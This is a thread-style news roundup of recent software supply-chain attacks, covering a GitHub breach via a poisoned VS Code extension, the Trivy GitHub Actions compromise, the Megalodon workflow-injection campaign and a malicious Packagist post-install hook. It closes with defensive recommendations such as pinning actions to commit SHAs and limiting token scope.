Supply-chain attacks hit GitHub repos

1/ A cluster of software supply-chain attacks has landed in the same place developers trust most: their build pipelines, package workflows and editor extensions. In the past week, GitHub confirmed unauthorized access to internal repositories after a poisoned VS Code extension hit an employee device, while separate campaigns pushed malicious GitHub Actions and package-install payloads into thousands of repositories. (github.blog) 2/ The GitHub incident was tied to a malicious version of the Nx Console VS Code extension. GitHub said on May 20 that the activity involved GitHub-internal repositories only, and that the attacker’s claim of about 3,800 repositories was “directionally consistent” with its investigation. GitHub also said it had no evidence of impact to customer repositories outside its internal systems. (github.blog) 3/ That matters because this was not a breach of GitHub’s core hosting platform in the usual sense. GitHub said it began with a compromised employee device and a third-party extension, which is a reminder that developer endpoints and tooling now sit directly on the attack path. (github.blog) 4/ The attack chain behind that breach traces back to TeamPCP, a threat actor that had already compromised Aqua Security’s Trivy ecosystem in March. Aqua’s advisory said that on March 19, 2026, an attacker used compromised credentials to publish a malicious Trivy release, force-push 76 of 77 `trivy-action` version tags, and replace all seven `setup-trivy` tags with malicious commits. (github.com) 5/ The Trivy compromise is important for one reason above all: many teams referenced those GitHub Actions by mutable tags instead of immutable commit SHAs. Aqua, Microsoft and NHS guidance all said users who pinned by tag rather than full commit SHA needed to review workflow runs during the March 19-20 exposure window. (github.com) 6/ In plain terms, a security scanner became a delivery mechanism. Microsoft said the Trivy incident “weaponiz[ed] trusted security tooling” against the organizations using it, after attackers leveraged access from a prior incident that was not fully remediated. (microsoft.com) 7/ The second big thread is scale. StepSecurity said a separate campaign, tracked as Megalodon, injected malicious GitHub Actions workflows into more than 5,500 public repositories on May 18 within a roughly six-hour window. The Hacker News, citing SafeDep, reported 5,718 commits across 5,561 repositories between 11:36 a.m. and 5:48 p.m. UTC. (stepsecurity.io) 8/ Megalodon’s payload was built to strip CI/CD environments for anything useful. Reported targets included cloud credentials, GitHub and GitLab tokens, SSH keys, Docker and Kubernetes configs, Vault and Terraform material, `.env` files and service-account files. That is why these incidents are being treated as infrastructure attacks, not just code-tampering events. (thehackernews.com) 9/ A third campaign widened the pattern beyond GitHub Actions. Socket found a malicious post-install hook across more than 700 GitHub repositories, including eight compromised Packagist packages, and said the malicious code was inserted into `package.json` rather than `composer.json`, targeting projects that ship JavaScript assets alongside PHP code. (socket.dev) 10/ That detail is easy to miss but operationally important. Teams that scan PHP dependency manifests may not inspect JavaScript install scripts buried inside the same project tree, which gave the attackers a cross-ecosystem route into build machines and CI runners. Socket and follow-up reporting said the hook downloaded and executed a Linux binary from a GitHub Releases URL during installs and workflows. (thehackernews.com) 11/ Across all three stories, the common failure is trust in automation without hard boundaries. A tagged action was assumed to stay the same. An editor extension was assumed to be safe because it came from a familiar workflow. A package install script was assumed to be routine build glue. The attackers used those assumptions as the entry point. (github.com) 12/ The practical response from defenders has been consistent. Aqua’s advisory points users to patched versions and exposure windows; GitHub says it has rotated critical secrets and continues monitoring; security researchers tracking Megalodon and the Packagist activity are urging teams to pin actions to immutable SHAs, reduce token scope, review CI secrets, and treat runners as production systems with logging and containment. (github.com) 13/ The broader lesson is not that open source suddenly became unsafe. It is that CI/CD, package managers and developer tooling now carry production-grade privileges, and attackers know it. The next updates to watch are GitHub’s incident posts, Aqua’s Trivy advisory, and ongoing research from firms tracking Megalodon and the Packagist campaign. (github.blog)